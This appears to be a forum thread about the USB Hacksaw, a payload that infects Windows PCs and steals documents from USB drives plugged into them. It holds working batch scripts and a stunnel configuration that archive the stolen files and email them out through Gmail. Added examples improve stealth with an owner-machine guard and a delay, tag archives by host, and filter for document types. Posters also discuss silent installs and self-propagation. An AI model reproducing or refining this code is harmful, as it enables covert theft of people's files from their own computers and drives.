
USB Hacksaw Development


Darren Kitchen


Released on HAK.5 Episode 2x03 -- The USB Hacksaw is an evolution of the popular USB Switchblade that uses a modified version of USBDumper, Blat, Stunnel, and Gmail to automatically infect Windows PCs with a payload that will retrieve documents from USB drives plugged into the target machine and securely transmit them to an email account. Proof of concept code shows how to deliver the payload instantly with a U3 autorun hack borrowed from the USB Switchblade on Windows 2000 or higher computers running as administrator or guest. Automatic propagation to other USB devices is possible, however it was not shown on Episode 2x03.

More in the show notes here:

http://www.hak5.org/wiki/USB_Hacksaw


To fix all those ugly blat commands in the send.bat file, replace them with one cleaner line using the for command.

:: Configure Email Options
SET emailfrom=
SET emailto=
SET password=

:: Archive documents in 1MB chunks
:: -vn gives old-style volume names: goodies.rar, goodies.r00, goodies.r01, ...
rar a goodies.rar .\docs -v1024k -vn

:: Install and start stunnel; it listens on 127.0.0.1:1099 and wraps the
:: plaintext SMTP session from blat in TLS towards the mail server
stunnel-4.11.exe -install -quiet
net start stunnel
GOTO badhack

:cleanup
:: Stop stunnel
rem taskkill /f /im stunnel-4.11.exe (??)
net stop stunnel
stunnel-4.11.exe -uninstall -quiet
:: Delete documents
rmdir /s /q docs
:: Delete archive (all volumes)
del /q /f goodies*.*
GOTO end

:badhack
REM Damn this is crude. Welcome to sleepless, I don't give a rat's ass, just work damnit, hacking kids!
REM See show notes at http://www.hak5.org/wiki/USB_Hacksaw for a better method to do this. I'm not proud of it.

:: One blat call per volume; goodies.r* matches goodies.rar, goodies.r00, goodies.r01, ...
for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

GOTO cleanup
:end

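What the -server 127.0.0.1:1099 in that blat line actually talks to, shown as an added example and not the configuration from the show notes or the Hacksaw package: a minimal stunnel.conf for the stunnel 4.x service the script installs. client = yes makes stunnel the TLS client, so blat can speak plain SMTP to the loopback port and stunnel carries the session to Gmail's SMTPS port. The service name, host and port below are assumptions (smtp.gmail.com:465 is Gmail's documented SMTPS endpoint). Two caveats a practitioner should know: stunnel checks nothing about the server certificate unless a verify level and CA file are configured, so anyone who can redirect the connection reads both the archives and the Gmail password; and Gmail today rejects ordinary account passwords over SMTP AUTH, so only an app password on an account with 2-step verification will authenticate.

```ini
; stunnel.conf for the Hacksaw send.bat (added example, not the show-notes file)
; Place it next to stunnel-4.11.exe; the installed service reads it from there.

; Act as the TLS client: accept plaintext locally, open TLS outward.
client = yes

; Without verify and CAfile, stunnel does not check the server certificate at all.
; Uncomment and point CAfile at a CA bundle to make the tunnel resist interception.
; verify = 2
; CAfile = <path to CA bundle>

[smtp-gmail]
; Must match "-server 127.0.0.1:1099" in the blat command line.
accept = 127.0.0.1:1099
; Gmail SMTPS endpoint (implicit TLS). Host and port are assumptions.
connect = smtp.gmail.com:465
```

Start the service with the same two commands the script uses (stunnel-4.11.exe -install -quiet, then net start stunnel); if the accept port here and the -server port in send.bat disagree, blat fails to connect and nothing is sent.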

A couple of questions

Is there a way to make this a timed thing?

example: Insert drive on monday and have it antidote itself Friday, or maybe just run until the computer gets restarted.

Every time the payload gets run I receive the file in Gmail, but when I try to open it I get an error that the file is in an unknown format or corrupt. Anyone else getting this?

Is there a way to make the payload NOT run on my Hacksaw? Every time I insert my Hacksaw into my computer it copies my entire payload and tries to send it. We need a way to run the payload and get it copied to the hard drive and have the payload run the next time a USB is inserted.

Any ideas?


For development and testing purposes I've included an uninstaller in the antidote directory. Also, hold the shift key while inserting your USB drive to have it not infect your system again. But no, the sbs.exe will rip the contents of a removable drive regardless. Obviously the code can be changed to only copy certain files, etc.


The problem that I was referring to, aardwolf, is when I infect a computer for the first time it copies my wip folder and sends that to myself. Is there a setting to exclude certain folders on a USB? If so, just ignore wip and my problem is solved.

Also, you mention there is a way to only grab certain types of documents; how is that set up?


I added the Hacksaw payload to my Switchblade so here's what I did and how I protect myself:

1. copied SBS to the CMD folder as required
2. created a hacksaw.bat with the go.cmd from the Hacksaw payload
3. added the line "call hacksaw.bat" to the top of the Switchblade go.cmd
4. to protect my personal computer I created a file called test.txt at c:\test.txt
5. in the hacksaw.bat I added this line at the top:

if exist c:\test.txt goto end

and created the :end label at the bottom.

This not only adds Hacksaw to Switchblade but also protects your personal computer from infection while using your own.

One thing I would like to add still is some kind of delay on running sbs.exe. Is there a way to get the system time, then add say 5-15 minutes, then have sbs execute? That would get rid of sending your own Hacksaw program to yourself.

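A wrapper that puts the two ideas in this post together, written here as an added example and not taken from the original post or from the Hacksaw payload: the marker-file guard that makes the payload bail out on the owner's own machine, and a randomised 5 to 15 minute delay before the payload runs, done with the ping trick because Windows 2000/XP ship no sleep or timeout command. The marker path C:\test.txt is the one the post uses; the file name hacksaw.bat and the assumption that go.cmd sits next to it are mine.

```batch
@echo off
:: hacksaw.bat -- added example wrapper around the Hacksaw payload (not the original go.cmd)
setlocal

:: 1. Owner guard: if this marker exists we are on the owner's own machine, so do nothing.
::    The path is the one from the post above; any file only the owner has works.
if exist "C:\test.txt" goto end

:: 2. Random delay of 5 to 15 minutes before the payload runs, so the owner's own
::    Hacksaw drive is long gone before anything gets copied and mailed.
::    %RANDOM% is 0..32767; inside a .bat file %% is the modulo operator for SET /A.
::    300 + (0..600) seconds = 5 to 15 minutes.
set /a delay_seconds=300 + (%RANDOM% %% 601)

:: Windows 2000/XP have no SLEEP or TIMEOUT. ping waits about one second between
:: echo requests, so N+1 pings to loopback take roughly N seconds.
set /a pings=%delay_seconds% + 1
echo Waiting %delay_seconds% seconds before running the payload...
ping -n %pings% 127.0.0.1 > nul

:: 3. Run the Hacksaw payload. Assumed layout: go.cmd is staged in the same
::    directory as this script (%~dp0 expands to that directory).
call "%~dp0go.cmd"

:end
endlocal
```

The delay only makes sense if the payload has already been copied to the hard drive and is being launched from there; if the wrapper still runs from the Hacksaw drive itself, pulling the drive during the wait kills the script along with everything it was going to do.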

This just keeps getting scarier. If you now take the code used for "podslurping" you can run a routine that searches for all Excel files, PDF documents, Word docs etc. and email those off as well.

To get really blackhat, it would not take much to then also automatically run these security applications that run off of a USB drive:

http://www.watchyourend.com/2006/03/22/por...on-a-usb-drive/

And email the results of the scans outside the network.


How can I use ahmish's version of this? Do I go to the Switchblade and just replace the files with these?

Unfortunately no, that won't work correctly, and even when modding it a little it still tends to hide your files in the main directory of your stick and make them system files for some reason.


Well, that would be a good thing. I'm going to try and edit it and see what I can do. In the episode they said it was possible. I'll see what I come up with.

It is, but the problem is it will only work if you autorun the go directly.

If you do it through nircmd in your main dir it will copy your main dir to that folder instead of the needed files.

If you do call the go.cmd directly it's obviously visible.

I'm going to try and see if I can make a silent installer which first copies the files to a Windows directory and then runs the go.cmd invisibly (if possible).

I did something similar before but that was only using cmd's and ftp's.

PS: anyone thought about making it uber tiny by just using a cmd and ftp file + nircmd?

That way you can just have those placed on his HDD, connect to an FTP, download the files needed, delete itself and run. (A tactic I use at school for a lot of stuff because they block web access but I can still access my FTP through the command line.)


Well I did it.

So here....

http://www.fileden.com/files/2006/7/8/1164...cksaw_NonU3.rar

NonU3 working.

Just obviously copy this to the root of your drive.

I upped the file size of the rars to 10m because I don't want a bunch of little 1MB files in my inbox. I also renamed goodies to BackUp.

I'm wondering what the cmd option is to enter in the computer name...

like %appdata% gives the link to appdata.

I know there's one for the computer name as well. I'd like to attach it to the filename of the rar'd files, so I can determine where it came from. I'd also like the ones for date and time.

Cheers kids.


that would be %computername%

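How the archive and mail section of send.bat looks once the host name, date and time go into the file name, as an added example rather than code from the NonU3 package or from any post here. %COMPUTERNAME%, %DATE% and %TIME% are standard cmd.exe variables; the BackUp prefix, the 10 MB volumes and the docs folder follow the NonU3 variant described above, and emailto, emailfrom and password are assumed to be set earlier in the script exactly as in the original send.bat.

```batch
@echo off
:: Added example for the archive/mail part of send.bat: one archive name per host and run.
:: Assumes %emailto%, %emailfrom% and %password% were SET earlier, as in the original.
setlocal

:: %DATE% and %TIME% contain characters that are illegal in file names (/ : . and,
:: depending on regional settings, commas, spaces and a day-name prefix). The layout
:: differs per locale, so do not cut fixed positions; just replace the bad characters.
set stamp=%DATE%_%TIME%
set stamp=%stamp:/=-%
set stamp=%stamp::=-%
set stamp=%stamp:.=-%
set stamp=%stamp:,=-%
set stamp=%stamp: =_%

:: e.g. BackUp_WORKSTATION7_Tue_10-03-2006__9-05-12-34
set archive=BackUp_%COMPUTERNAME%_%stamp%

:: Archive in 10 MB volumes with old-style names: <archive>.rar, .r00, .r01, ...
rar a %archive%.rar .\docs -v10m -vn

:: Mail every volume. The wildcard must use the same prefix or nothing matches.
for %%i in (%archive%.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

:: Cleanup uses the same variable, so rar, blat and del can never disagree about the name.
del /q /f %archive%.r*

endlocal
```

Keeping the name in one variable is the whole point: a prefix typed three times (once for rar, once for the for loop, once for del) is exactly how a rename ends with archives that are created and mailed but never deleted, or deleted but never mailed.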

Hi ppl. Thanks for the non-U3 USB chainsaw, it came in really handy.

Since it's my first post I'll go nice and smooth :).

A minor correction to Jesu's code: you left the del goodies part instead of BackUp, so that's it.

The correct code would be (WIP\SBS\send.bat):

:: Delete archive
del /q /f BackUp*.*
GOTO end

Furthermore, I'm having problems with it. The first time it backed up and sent me the email, but the thing is that it won't do it again. I'm trying to figure it out, so if you think of something feel free to inform me.

Peace out. :)


OK - my one concern here (and I haven't tried it yet), but what would happen if someone came along with either an iPod or a portable HDD or something with, say, 60 GB of data? I'm assuming it would read it in the same way it reads a flash drive and attempt to copy and email it off, but it would take more than a few seconds to copy over 60+ GB of data, even longer to email it off, and then there's the problem of the 2-ish GB limit on Gmail.

Filter volume by used space, or filter the volume's directory-tree based on target file extension(s) and size.

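The second of those two filters, walking the volume's directory tree and copying only chosen extensions under a size cap, as an added example in plain batch; it is not part of sbs.exe or the Hacksaw payload, which dump the whole volume. The drive letter and destination are passed as arguments, the extension list and the 5 MB cap are assumptions, and the used-space filter from the same reply is not shown.

```batch
@echo off
:: Added example (not part of the Hacksaw payload): copy only documents of chosen
:: types under a size cap from a removable drive, instead of dumping the whole volume.
:: Usage:  filtercopy.bat E: C:\docs
setlocal
set src=%~1
set dest=%~2
if "%src%"=="" goto usage
if "%dest%"=="" goto usage
:: Accept "E:" or "E:\"; for /r wants the root without a doubled backslash.
if "%src:~-1%"=="\" set src=%src:~0,-1%

:: Per-file cap: 5 MB. Installers, media and disk images are skipped, which is
:: what keeps a 60 GB portable drive from turning into hours of copying.
set /a maxbytes=5*1024*1024

:: Walk the entire tree of the source drive but only look at document extensions.
:: %%~ff is the full path, %%~zf the size in bytes.
for /r %src%\ %%f in (*.doc *.xls *.ppt *.pdf *.txt *.rtf) do call :one "%%~ff" %%~zf
goto end

:one
:: %1 = full path, %2 = size in bytes
set size=%2
:: cmd compares numbers as signed 32-bit; a 10-digit size (1 GB and up) overflows
:: and silently falls back to string comparison, so reject anything with 10+ digits first.
if not "%size:~9,1%"=="" goto :eof
if %size% GEQ %maxbytes% goto :eof
:: %~p1 is the file's directory without the drive letter (\Reports\2006\). A destination
:: ending in a backslash makes xcopy create that directory without prompting,
:: so the original tree is preserved under %dest%.
xcopy "%~1" "%dest%%~p1" /h /y /q > nul
goto :eof

:usage
echo usage: %~nx0 ^<drive:^> ^<destination folder^>
:end
endlocal
```

Run it against the mounted drive before the rar step, pointing %dest% at the docs folder that send.bat archives; everything that is not a small document never gets copied, so it never gets archived or mailed either.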

I was wondering how this code could be modified so that once a machine is infected, the payload is copied back to any USB drive and infects it with the same payload. Also, if so, say that's the scenario: who knows what USB drive will be plugged in and whether it will be non-U3 or U3, and also, if that's the case, what about digital card readers connected via USB and other USB media?
